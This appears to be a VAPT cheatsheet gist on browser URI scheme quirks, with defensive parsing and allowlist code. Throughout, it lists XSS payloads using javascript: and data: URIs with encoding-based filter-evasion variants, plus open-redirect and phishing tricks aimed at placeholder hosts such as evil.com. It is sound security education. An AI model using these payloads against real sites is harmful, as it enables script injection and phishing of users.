@aravindkumarsvg
Last active September 14, 2025 18:00
URI Schemes Quirks

📑 URI Schemes & Quirks Cheatsheet (for VAPT)

This cheatsheet summarizes URI schemes, their quirks, encoding tricks, and abuse potential.
Useful for a VAPT engineer’s quick recall.


1. Common Dangerous URI Schemes

| Scheme | Example | Quirks / Abuse Potential |
| --- | --- | --- |
| javascript: | <a href="javascript:alert(1)"> | Executes inline JS when clicked. Filter evasion via case-mixing (JaVaScRiPt:), leading whitespace or embedded tab/newline characters (a space directly before the colon breaks the scheme), or HTML entity encoding (&#x6a;avascript:). |
| data: | <iframe src="data:text/html,<script>alert(1)</script>"> | Embeds inline resources (HTML, SVG, CSS, JS, images). Can bypass CSP if data: is allowed. Variants: data:image/svg+xml;base64,..., data:text/html;base64,.... |
| vbscript: | <a href="vbscript:msgbox(1)"> | IE-only legacy scheme. Mostly dead, but still relevant in old apps. |
| file: | <a href="file:///etc/passwd"> | Local file inclusion / leaks in some misconfigured apps. |

2. Lesser-Known URI Schemes (Potential Attack Surface)

| Scheme | Example | Notes |
| --- | --- | --- |
| mailto: | <a href="mailto:[email protected]?subject=Hi&body=<script>alert(1)</script>"> | Sometimes vulnerable in mail clients (header injection). |
| tel: | <a href="tel:123456789"> | Not dangerous alone, but useful in phishing. |
| sms: | <a href="sms:12345?body=Click%20this%20link"> | Can prefill malicious SMS content. |
| mhtml: | <iframe src="mhtml:http://evil.com/file.mht!x-usc:http://victim.com"> | Legacy IE/Edge quirk: can reference external and internal resources. |
| blob: | <iframe src="blob:https://victim.com/uuid"> | Often used to bypass CSP. Content generated via URL.createObjectURL(). |
| filesystem: | filesystem:https://victim.com/temporary/evil.html | Similar to blob:, rarely seen now. |

3. OS / Application Launcher URI Schemes (Deep Links)

| Scheme | Example | Effect |
| --- | --- | --- |
| ms-word: | ms-word:ofe\|u\|… | Opens the document at the given URL in Word for editing (ofe = open for edit). |
| ms-excel: | ms-excel:ofe\|u\|… | Opens the document at the given URL in Excel for editing. |
| ms-access: | ms-access:ofv\|u\|… | Opens the document at the given URL in Access for viewing (ofv = open for view). |
| skype: | skype:echo123?call | Launches Skype and makes a call. |
| zoommtg: | zoommtg://zoom.us/join?action=join&confno=123456 | Launches Zoom client. |
| slack: | slack://open?team=T123&id=C123 | Opens Slack app. |
| whatsapp: | whatsapp://send?text=Hello | Opens WhatsApp with prefilled text. |
| tg: | tg://resolve?domain=someuser | Opens Telegram app. |
| steam: | steam://run/730 | Launches a Steam game. |
| itms-services: | itms-services://?action=download-manifest&url=https://evil.com/app.plist | iOS enterprise app install (phishing vector). |
| market: | market://details?id=com.evil.app | Opens Google Play Store. |
| intent: (Android) | intent://scan/#Intent;scheme=http;package=com.evil.app;end | Android deep links to apps. |

4. Browser-Supported URI Encoding / Obfuscation Techniques

Different browsers parse URIs leniently → allowing attacker-friendly quirks.

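| Technique | Example | Browser Support / Notes |
| --- | --- | --- |
| Case variations | JaVaScRiPt:alert(1) | All modern browsers treat the scheme case-insensitively. |
| Extra whitespace | " javascript:alert(1)" (leading space) | Browsers strip leading and trailing spaces and C0 control characters from the URL. A space directly before the colon (javascript :alert(1)) is not stripped and breaks the scheme, so it does not execute. |
| Tab / newline injection | java&#10;script:alert(1) | Modern browsers remove tab, LF, and CR characters anywhere in the URL before parsing, so this executes. The character must be real (literal, or entity-encoded such as &#9; or &#10;); the two-character text \n is not a newline in HTML. IE historically executed these as well. |
| HTML entities (decimal/hex) | &#106;avascript:alert(1) (&#106; = j) | All browsers decode HTML entities inside attributes (href, src). |
| Percent encoding (URL encoding) | javascript:%61lert(1) (%61 = a) | All major browsers percent-decode the body of a javascript: URL; the scheme itself is never percent-decoded. |
| Double encoding | javascript:%2561lert(1) | Browsers decode only once, leaving %61lert(1), which is a syntax error. Works only when the application or an intermediary decodes once before the value reaches the browser. |
| JavaScript Unicode escape | javascript:\u0061lert(1) | Decoded by the JavaScript engine, so it works in inline script and in the code part of a javascript: href; it does not work in the scheme. |
| CSS-style escape | javascript:\0061lert(1) | Parsed in CSS contexts, not usually URIs, but useful in <style>@import url()</style>. |
| Homoglyph attacks (Unicode lookalikes) | javаscript: (Cyrillic а) | Browsers do not accept lookalike characters as the scheme. Relevant when a filter, backend, or display layer normalizes or visually confuses them. |
| Protocol-relative URLs | <a href="//evil.com"> | Loads https://evil.com if parent page is HTTPS. |
| Userinfo @ trick | http://victim.com@evil.com | Host is evil.com; victim.com is parsed as userinfo and ignored. Works in Chrome, FF, Safari. |
| Embedded nulls (%00) | http://evil.com%00.victim.com | Some old parsers split incorrectly. Mostly fixed. |
| Non-printable chars | java&#x200B;script:alert(1) (U+200B zero-width space) | Modern browsers do not strip U+200B, so it breaks the scheme. Useful against filters or sanitizers that remove invisible characters after validation. |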
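
To check which of these variants still resolve to a javascript: scheme, the WHATWG URL parser that ships with Node and browsers can be queried directly. The sketch below is only an illustration: effectiveScheme and the BASE page URL are hypothetical names, and the inputs are assumed to be attribute values after HTML entity decoding.

```javascript
// Assumed page URL, used when the input turns out to be a relative reference.
const BASE = "https://victim.example/page";

// Hypothetical helper: the scheme a WHATWG-compliant parser ends up with.
function effectiveScheme(attrValue) {
  try {
    return new URL(attrValue, BASE).protocol;
  } catch {
    return null; // the parser rejected the input
  }
}

const samples = [
  "JaVaScRiPt:alert(1)",       // mixed case
  " javascript:alert(1)",      // leading space
  "java\nscript:alert(1)",     // real newline inside the scheme
  "javascript :alert(1)",      // space directly before the colon
  "javascript%3Aalert(1)",     // percent-encoded colon
  "java\u200Bscript:alert(1)", // zero-width space inside the scheme
];

for (const s of samples) {
  console.log(JSON.stringify(s), "->", effectiveScheme(s));
}
```

Inputs that do not yield a scheme are resolved as relative references against BASE, which is why they report the page's own scheme.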

5. data: URI Payload Examples

| Payload | Effect |
| --- | --- |
| data:text/html,<script>alert(1)</script> | Executes inline HTML/JS. |
| data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"> | SVG-based XSS. |
| data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== | Same as the first payload, but base64-encoded. |
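
When reviewing captured payloads it helps to see what a data: URI actually carries. The following is a minimal sketch, not a full RFC 2397 parser; decodeDataUri is a hypothetical helper and it assumes the body is ASCII.

```javascript
// Hypothetical helper: split a data: URI into its media type and decoded body.
function decodeDataUri(uri) {
  const match = /^data:([^,]*),(.*)$/is.exec(uri);
  if (!match) return null;
  const meta = match[1];
  const isBase64 = /;base64$/i.test(meta);
  // Fall back to text/plain when the media type is omitted.
  const mediaType = meta.replace(/;base64$/i, "") || "text/plain";
  // atob handles the base64 form; percent-decoding handles the plain form.
  const body = isBase64 ? atob(match[2]) : decodeURIComponent(match[2]);
  return { mediaType, body };
}

console.log(decodeDataUri("data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="));
```

Both the plain and the base64 form of the first payload decode to the same markup, which is why a filter that only looks for a literal script tag misses the encoded variant.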

6. CSP (Content Security Policy) Relevance

  • If script-src 'self' data:, then data: URIs can still inject JS.
  • If script-src 'unsafe-inline', then javascript: and entity-encoded URIs may slip through.
  • blob: and filesystem: often overlooked in CSP configs.
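
A quick way to spot these gaps during a review is to parse the policy string and list the scheme sources that apply to scripts. This is a rough sketch under simplifying assumptions: riskyScriptSources and parseCsp are hypothetical helpers, and only the script-src to default-src fallback is modeled.

```javascript
// Sources that commonly weaken script restrictions.
const RISKY_SOURCES = new Set(["data:", "blob:", "filesystem:", "'unsafe-inline'"]);

// Split a policy string into a map of directive name -> source list.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources);
    }
  }
  return directives;
}

// Hypothetical audit helper: risky sources that govern script loading.
function riskyScriptSources(policy) {
  const directives = parseCsp(policy);
  // script-src falls back to default-src when it is absent.
  const sources = directives.get("script-src") ?? directives.get("default-src") ?? [];
  return sources.filter((s) => RISKY_SOURCES.has(s.toLowerCase()));
}

console.log(riskyScriptSources("default-src 'self'; script-src 'self' data:"));
```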

7. Open Redirect Tricks with URI Schemes

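  • <a href="//evil.com"> → loads external site using the current page's scheme.
  • <a href="////evil.com"> → browsers collapse the extra slashes and treat evil.com as the host.
  • <a href="http:@evil.com"> → resolves to http://evil.com when the page's own scheme is not http: (for example on an HTTPS page); on an http: page it is treated as a relative path.
  • <a href="http://victim.com@evil.com"> → phishing trick: victim.com is userinfo, the host is evil.com.
  • <a href="ms-word:ofe|u|http://evil.com/file.docx"> → auto-launch apps.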
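
Redirect targets like these are easiest to judge after resolving them the way a browser would. The sketch below assumes an HTTPS page at a placeholder host; isSameOrigin, PAGE, victim.example and evil.example are illustrative names, not part of any real application.

```javascript
// Assumed URL of the page that performs the redirect.
const PAGE = "https://victim.example/login";

// Hypothetical check: does the target stay on the page's own origin?
function isSameOrigin(target, page = PAGE) {
  try {
    return new URL(target, page).origin === new URL(page).origin;
  } catch {
    return false; // unparseable targets are rejected
  }
}

const targets = [
  "/account",
  "//evil.example",
  "////evil.example",
  "http:@evil.example",
  "http://victim.example@evil.example",
  "ms-word:ofe|u|http://evil.example/file.docx",
];

for (const t of targets) {
  console.log(t, "->", new URL(t, PAGE).href, isSameOrigin(t));
}
```

Comparing origins after resolution avoids string checks such as "starts with /" or "contains victim.example", which the listed tricks are designed to pass.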

✅ Key Takeaways for VAPT

  • Browsers are lenient parsers: case-insensitivity, whitespace, and encodings expand attack surface.
  • javascript:, data:, vbscript: remain classic vectors.
  • Obfuscation via percent encoding, HTML entities, homoglyphs, and protocol-relative URLs bypasses many weak filters.
  • CSP is an allowlist: keep data:, blob:, and filesystem: out of script-src (and default-src) unless they are strictly required, otherwise they become a bypass.
  • OS / App launch URIs are often forgotten in open redirect testing.

URI Scheme Quirks Cheatsheet

This document collects quirks and odd behaviors in URI scheme handling across browsers, useful for VAPT engineers.


1. javascript: URI Decoding

<a href="javascript:alert(%27123%27)">Click</a>
  • %27 is URL-encoded '.

  • Browser decodes before execution, so the JS engine sees:

    alert('123');
  • Unlike http(s): URLs, the body of a javascript: URL is percent-decoded by the browser before it is handed to the JavaScript engine.

Obfuscation Tricks

  • Double encoding:

    <a href="javascript:alert(%25271%2527)">Click</a>

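    %2527 → %27 → ' (the browser decodes only once, so this executes only if something else, such as the server, decodes once before the value reaches the browser)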

  • Mixed case & Unicode homoglyphs sometimes bypass filters.
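
The single decoding pass can be modeled in a few lines. This is an approximation for illustration only: scriptSourceOf is a hypothetical helper, and decodeURIComponent is stricter than a browser because it throws on malformed escapes.

```javascript
// Hypothetical model: the script text a browser would evaluate for a javascript: URL.
function scriptSourceOf(href) {
  const url = new URL(href);
  if (url.protocol !== "javascript:") return null;
  // Everything after the scheme is the (still encoded) script source.
  const encoded = url.href.slice(url.protocol.length);
  // One percent-decoding pass, as applied before evaluation.
  return decodeURIComponent(encoded);
}

console.log(scriptSourceOf("javascript:alert(%27123%27)"));
console.log(scriptSourceOf("javascript:alert(%25271%2527)"));
```

The second call shows why double encoding does not run on its own: after one pass the source still contains %27, which is not valid JavaScript.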


2. http(s): URI No Decoding

<a href="https://example.com?%27">Click</a>
  • %27 remains literal in the outgoing request:

    https://example.com/?%27
    
  • Server decides whether to decode into '.
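
The same behavior can be observed with the WHATWG URL class, used here as a stand-in for the browser's serializer and for a server-side query parser. This is a small sketch, not a statement about any particular server framework.

```javascript
const url = new URL("https://example.com?%27");

// The serialized URL keeps the escape exactly as written.
console.log(url.href);

// A query-string parser decodes it when the application asks for parameters.
console.log([...url.searchParams.keys()]);
```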


3. data: URI Execution

<a href="data:text/html,<script>alert(1)</script>">Click</a>
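  • Browser interprets inline HTML/JS directly. Current Chrome and Firefox block top-level navigation to data: URLs from links, so this mostly applies to embedded contexts such as iframes.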

  • Common for stored XSS payloads and bypasses.

  • Can be obfuscated with encoding:

    data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
    
  • Double encoding works only where something decodes once before the browser sees the value.


4. vbscript: (legacy IE-only)

<a href="vbscript:MsgBox(1)">Click</a>
  • Supported only in old IE.
  • Deprecated, but may exist in legacy environments.

5. file: Scheme

<a href="file:///etc/passwd">Click</a>
  • Accesses local files.
  • Modern browsers block pages served over HTTP/HTTPS from linking to or loading file: resources.
  • Sometimes abused via local file inclusion (LFI) vectors in apps.

6. Mixed Scheme Behavior

  • javascript: in <iframe src>:

    <iframe src="javascript:alert(1)"></iframe>

    Executes in the iframe's initial about:blank document, which inherits the parent's origin.

  • data: in <iframe>:

    <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

    Executes in a separate document with an opaque (null) origin, so it cannot read the parent's DOM or cookies.


7. URL Fragments

<a href="https://example.com/#javascript:alert(1)">Click</a>
  • Fragment identifiers (#...) are not sent to the server.
  • Some DOM sinks (location.hash) may re-trigger decoding/execution if used unsafely.
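
The split between what the server sees and what client-side code sees can be shown with the URL class. The handler below is a hypothetical example of treating the fragment as untrusted text; safeAnchor is an illustrative name.

```javascript
const link = new URL("https://example.com/#javascript:alert(1)");

// What the server receives: path and query only.
const requestTarget = link.pathname + link.search;

// What client-side code can read: the fragment, including the payload text.
const fragment = decodeURIComponent(link.hash.slice(1));

// Hypothetical safe handler: accept only fragments that look like an element id.
function safeAnchor(hash) {
  const id = hash.replace(/^#/, "");
  return /^[A-Za-z][\w-]*$/.test(id) ? id : null;
}

console.log(requestTarget, fragment, safeAnchor(link.hash));
```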

8. Advanced Obfuscation Examples

  • Hex encoding in javascript:

    <a href="javascript:%61lert(1)">Click</a>

    %61 → a

  • Unicode escapes

    <a href="javascript:\u0061lert(1)">Click</a>
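  • Comment injection (a comment cannot split an identifier, so it goes between tokens)

    <a href="javascript:alert/**/(1)">Click</a>
  • Mixed hex + octal escapes (valid only inside string literals, so the code is wrapped in eval)

    <a href="javascript:eval('\x61l\145rt(1)')">Click</a>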

Summary for VAPT

  • javascript:: decoded & executed, multiple obfuscation paths.
  • http(s):: encoding preserved until server-side.
  • data:: inline execution possible, encoding tricks apply.
  • file:: local file risks.
  • vbscript:: legacy, still important for old IE.
  • Fragments & iframe contexts add extra complexity.

HTML Encoding Quirks

Note

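  • Percent-decoding applies only when the browser navigates to a javascript: URL (for example an anchor href activated by a click). Event-handler attributes such as onerror contain plain JavaScript, so nothing in them is URL-decoded; the javascript: prefix there is just a statement label.
<img src=X onerror="javascript:fetch('https://example.com?%3e')" > 
  • Here %3e is not decoded; the request is sent with %3e as written.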

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>
  • Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon

<a href="javascript&#x3A;alert(1)">Click me</a>
  • &#x3A; is the HTML entity for :.

  • Browsers decode HTML entities inside attributes before interpreting them.

  • This becomes:

    <a href="javascript:alert(1)">Click me</a>
  • Still executable.


Case 3: Partially Encoded Keyword

<a href="javasc&#114;ipt:alert(1)">Click me</a>
  • &#114; = r.
  • After decoding, the browser sees javascript:alert(1).
  • Still executes.

Why?

  • HTML entity decoding happens during parse time.
  • Then the URI scheme (javascript:) is recognized and executed.
  • The source of the characters (literal vs entity) doesn’t matter.
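
The effect on a filter that inspects the raw attribute text can be sketched as follows. decodeNumericEntities is a hypothetical helper covering only numeric references; a real HTML parser also handles named entities and references without a trailing semicolon.

```javascript
// Hypothetical decoder for numeric character references (&#NNN; and &#xHH;).
function decodeNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (_, ref) => {
    const code = /^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return String.fromCodePoint(code);
  });
}

// A naive filter that looks at the attribute text as written in the markup.
const naiveFilterBlocks = (raw) => raw.toLowerCase().startsWith("javascript:");

const raw = "javasc&#114;ipt&#x3A;alert(1)";
console.log(naiveFilterBlocks(raw));                        // checks the encoded text
console.log(naiveFilterBlocks(decodeNumericEntities(raw))); // checks what the browser sees
```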

Security Implications

  • Encoding characters inside attributes does not neutralize dangerous JavaScript URIs.

  • HTML encoding is not a sufficient defense against XSS in href.

  • Correct mitigations:

    • Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
    • Prefer an allowlist (only http://, https://, mailto:).
    • Use a security-focused HTML sanitizer.
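
An allowlist check is most reliable when it runs on the parsed URL rather than on the raw string. The sketch below assumes the value has already been HTML-entity-decoded and that relative links should resolve against a known page URL; isSafeHref and app.example are hypothetical.

```javascript
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// value: attribute value after entity decoding; base: assumed page URL.
function isSafeHref(value, base = "https://app.example/") {
  try {
    // The parser lowercases the scheme and strips leading whitespace,
    // tabs and newlines, so obfuscated schemes are normalized first.
    return ALLOWED_SCHEMES.has(new URL(value, base).protocol);
  } catch {
    return false; // reject anything the parser cannot handle
  }
}

console.log(isSafeHref("JaVaScRiPt:alert(1)"), isSafeHref("/profile"));
```

This complements, and does not replace, a security-focused HTML sanitizer.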

✅ Key Takeaway

If you add HTML encoding inside href with a JavaScript URI, the browser decodes it back before execution. ➡️ It still works and remains equally dangerous.


Javascript URI Encoding Quirks

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Javascript URI encoding - Quirks</title>
</head>
<body>
   <a href="javascript:alert(1)">Click me</a>
   <hr>
   <a href="javascript:alert%28&#x27;1&apos;)">Click Me - URL Encoding + HTML Encoding</a>  <!-- This works: the HTML parser decodes the entities, and the browser percent-decodes the URL body before passing it to the JavaScript engine -->
   <hr>
   <a href="javascript&#x3A;alert(1)">Click me - HTML Encoding</a> <!-- This works: the HTML parser decodes the entity, producing a literal colon -->
   <hr>
   <a href="javascript%3Aalert(1)">Click me - URL Encoding of URI scheme separator (colon) </a> <!-- This won't work: percent-encoding is only decoded after the scheme, so the colon must be literal -->
   <hr>
   <a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me - Unicode Encoding of javascript scheme</a> <!-- This won't work: only the JavaScript engine understands \u escapes, and the scheme is parsed before any JavaScript runs -->
   <hr>
   <a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me - Unicode encoding of javascript code</a> <!-- This works: JavaScript accepts \u escapes in identifiers -->
</body>
</html>

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>
  • Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon (HTML Entity)

<a href="javascript&#x3A;alert(1)">Click me</a>
  • &#x3A; is the HTML entity for :.

  • Browsers decode HTML entities inside attributes before interpreting them.

  • This becomes:

    <a href="javascript:alert(1)">Click me</a>
  • Still executable.


Case 3: Partially Encoded Keyword (HTML Entity)

<a href="javasc&#114;ipt:alert(1)">Click me</a>
  • &#114; = r.
  • After decoding, the browser sees javascript:alert(1).
  • Still executes.

Case 4: URL Encoding of Code

<a href="javascript:alert%28&#x27;1&apos;)">Click me</a>
  • %28 is URL encoding for ( and &#x27;/&apos; are HTML entity encodings for '.
  • The HTML parser decodes entities first; the browser then percent-decodes the body of the javascript: URL before handing it to the JavaScript engine.
  • ✅ This works because both decoding steps occur before execution.

Case 5: URL Encoding of Scheme Separator

<a href="javascript%3Aalert(1)">Click me</a>
  • %3A is URL encoding for :.
  • Browsers do not percent-decode the scheme, so no javascript: scheme is recognized.
  • The value is parsed as a relative URL (javascript%3Aalert(1)), and clicking navigates to that path on the current site.
  • Does not execute.

Case 6: Mixed Encodings

<a href="javasc%72ipt&#x3A;alert(1)">Click me</a>
  • %72 is URL encoding for r, and &#x3A; is HTML entity for :.
  • HTML entities are decoded, but percent-encoding is never decoded inside the scheme, so %72 stays as written.
  • Result: javasc%72ipt:alert(1) → ❌ Non-executable.

Case 7: Unicode Escape in Scheme

<a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me</a>
  • These are JavaScript string escapes, not HTML or URL encodings.
  • Inside an HTML attribute, they are not decoded by the parser.
  • Treated literally → ❌ Non-executable.

Case 8: Unicode Escape in JavaScript Code

<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me</a>
  • Here the scheme is valid (javascript:), and the code uses Unicode escapes.
  • The JavaScript engine decodes the Unicode escapes into alert.
  • Executable.

Why?

  • HTML entity decoding happens at parse time.
  • URL encoding (%xx) is decoded only in the body of a javascript: URL, after the scheme; in the scheme part it is never decoded, so the scheme is not recognized.
  • Unicode escapes are ignored by the HTML parser but are handled by the JavaScript engine if inside valid JS code.
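
The cases above can be replayed through a rough two-stage model: entity decoding, then URL parsing. This is a sketch under stated assumptions, not a browser emulator: decodeEntities covers only numeric references and &apos;, runsAsScript is a hypothetical name, and site.example is a placeholder page URL.

```javascript
// Stage 1: a very small stand-in for HTML attribute entity decoding.
const decodeEntities = (text) =>
  text
    .replace(/&apos;/g, "'")
    .replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (_, ref) =>
      String.fromCodePoint(/^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10)));

// Stage 2: parse as a URL; return the script text if it is a javascript: URL, else null.
function runsAsScript(attrValue, base = "https://site.example/") {
  const url = new URL(decodeEntities(attrValue), base);
  if (url.protocol !== "javascript:") return null;
  return decodeURIComponent(url.href.slice(url.protocol.length));
}

const cases = {
  "Case 4": "javascript:alert%28&#x27;1&apos;)",
  "Case 5": "javascript%3Aalert(1)",
  "Case 6": "javasc%72ipt&#x3A;alert(1)",
  "Case 7": "\\u006a\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074:alert(1)",
  "Case 8": "javascript:\\u0061\\u006C\\u0065\\u0072\\u0074(1)",
};

for (const [name, value] of Object.entries(cases)) {
  console.log(name, "->", runsAsScript(value));
}
```

A null result means the value was treated as a relative URL; in Case 8 the returned text still contains the \u escapes, which the JavaScript engine resolves when it evaluates the code.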

Security Implications

  • HTML entity encoding does not protect against JavaScript URIs.

  • URL encoding can sometimes prevent execution (scheme obfuscation), but can still work in code portions.

  • Unicode escapes can be used to bypass naive filters inside JS code.

  • Correct mitigations:

    • Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
    • Use an allowlist (http://, https://, mailto: only).
    • Apply a security-focused HTML sanitizer.

✅ Key Takeaway

  • HTML entities inside href are decoded → still dangerous.
  • URL encoding may break execution in schemes but can work inside code → inconsistent.
  • Unicode escapes in the scheme don’t work, but inside JavaScript code they do.
  • Always validate and sanitize URIs instead of relying on encoding quirks.

URLs without scheme (e.g. //example.com) — quick cheatsheet

What it is

  • //example.com/path is a protocol-relative (scheme-relative) or network-path reference per RFC 3986.

  • Browsers resolve it by using the current page's scheme:

    • Page https://site + //example.com → https://example.com
    • Page http://site + //example.com → http://example.com

Where you see it (HTML / CSS attributes)

Common attributes/tags that accept these:

  • <img src="//cdn.example.com/p.png">
  • <script src="//cdn.example.com/lib.js"></script>
  • <link href="//fonts.example.com/style.css">
  • <iframe src="//example.com"></iframe>
  • <a href="//example.com"> (behaves like absolute URL w/o scheme)
  • <source srcset="//...">, <video src="//...">, <audio src="//...">
  • CSS: background-image: url("//images.example.com/bg.png");

Also applies to srcset entries and @import in CSS.

Related URL forms (for comparison)

  • Absolute with scheme: https://example.com/foo — explicit scheme.
  • Protocol-relative / scheme-relative: //example.com/foo — inherits document scheme.
  • Root-relative: /foo/bar — same origin, absolute path on current host.
  • Path-relative: images/p.png or ./p.png — relative to current document path.
  • Query/Hash only: ?q=1 or #anchor — same document, modifies query/hash.
  • Data URI: data:text/html,... — inline resource.
  • Scheme-only / custom: mailto:, tel:, file:, javascript: — special handling by user agent.
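
Each of these forms can be resolved against a page URL to see what the browser would request. The page URLs below are placeholders chosen for illustration, and resolve is a hypothetical one-line helper around the WHATWG URL class.

```javascript
// Assumed page URLs, one per scheme, to show scheme inheritance.
const HTTPS_PAGE = "https://site.example/dir/page.html?x=1";
const HTTP_PAGE = "http://site.example/dir/page.html?x=1";

// Resolve a reference the way a browser does for an attribute on that page.
const resolve = (ref, base) => new URL(ref, base).href;

const refs = [
  "https://example.com/foo", // absolute with scheme
  "//example.com/foo",       // protocol-relative
  "/foo/bar",                // root-relative
  "images/p.png",            // path-relative
  "?q=1",                    // query only
  "#anchor",                 // hash only
];

for (const ref of refs) {
  console.log(ref, "->", resolve(ref, HTTPS_PAGE), "|", resolve(ref, HTTP_PAGE));
}
```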

Edge cases & parsing notes

  • //user:pass@host:8080/path — credentials can appear, but modern browsers may ignore credentials in cross-origin contexts or warn.
  • Browsers parse a value starting with // as a URL with an authority; leading and trailing whitespace is stripped, and tabs and newlines are removed anywhere in the value before parsing.
  • Spaces inside the URL are not removed: in the path they are percent-encoded, and in the host they make the URL invalid.

Security & operational implications (VAPT checklist)

  • Mixed content behavior: // will become http:// on an http page — risk for downgrade if the page is loaded over HTTP. On HTTPS pages it becomes https:// (safe if the resource supports TLS).
  • CSP matching: CSP sources like https: match resources loaded via // when resolved to https. // does not bypass CSP — CSP evaluates the resolved URL against policies.
  • Resource reuse / cache: Same resource URL but loaded over different schemes may be treated differently by caches/Browsers.
  • Host header / SSRF: If user-controlled, //attacker.com may be used to cause requests to attacker domains (useful for exfil / tracking). Validate/whitelist hosts.
  • Protocol-relative with file: or other schemes: If the document is served from a non-HTTP scheme (e.g., file:), // is resolved relative to that context — rarely used but can produce odd behavior.
  • Open redirect / link confusion: <a href="//evil.com"> will navigate away from site — ensure user input isn't allowed to inject such links.
  • Mixed-origin assumptions: Root-relative and protocol-relative URLs are different. //example.com is cross-origin if host ≠ current host; /path stays same origin.
  • Phishing & UX: //example.com displayed without scheme in some UIs may look like a relative link; visually ambiguous.

Practical test cases

  • On an HTTPS page, test <img src="//attacker.test/track"> → should fetch over HTTPS.
  • On an HTTP page, test same link → fetch over HTTP (downgrade).
  • Inject //attacker.example into attributes that accept URLs and see whether filters/blocklists strip schemes or only check for http(s).
  • Test CSP: add Content-Security-Policy: default-src 'self' https: and try //evil vs http://evil vs https://evil.
  • Check srcset parsing with // entries (complex parser paths — some filters miss them).

Quick examples

<!-- protocol-relative -->
<script src="//cdn.example.com/lib.js"></script>

<!-- root-relative (same host) -->
<link href="/assets/style.css" rel="stylesheet">

<!-- path-relative -->
<img src="images/pic.png">

<!-- absolute with scheme -->
<img src="https://images.example.com/pic.png">

<!-- data URI (inline) -->
<iframe src="data:text/html;base64,PGgxPkhlbGxvPC9oMT4="></iframe>

Short recommendations

  • Prefer explicit HTTPS (https://...) for external resources, both to avoid downgrade and for clarity.
  • Validate/whitelist hostnames if users can supply URLs.
  • Normalize and canonicalize URLs server-side before storing or using them.
  • Use a CSP that restricts origins (frame-src, img-src, script-src, etc.) instead of relying on scheme-relative behavior.
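
The first three recommendations can be combined into one server-side normalization step. This is a minimal sketch under stated assumptions: normalizeResourceUrl is a hypothetical helper, and the host allowlist reuses example hostnames from this cheatsheet as placeholders.

```javascript
// Assumed allowlist of hosts that may serve external resources.
const ALLOWED_HOSTS = new Set(["cdn.example.com", "images.example.com"]);

// Resolve, upgrade to HTTPS, and validate the host; returns the canonical URL or null.
function normalizeResourceUrl(input, pageUrl) {
  let url;
  try {
    url = new URL(input, pageUrl);
  } catch {
    return null;
  }
  if (url.protocol === "http:") url.protocol = "https:"; // make the scheme explicit
  if (url.protocol !== "https:") return null;            // rejects javascript:, data:, etc.
  if (url.username || url.password) return null;         // rejects the userinfo @ trick
  if (!ALLOWED_HOSTS.has(url.hostname)) return null;
  return url.href;
}

console.log(normalizeResourceUrl("//cdn.example.com/lib.js", "http://site.example/"));
```

Storing the returned canonical form, instead of the user's original string, means later consumers never see a scheme-relative value.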
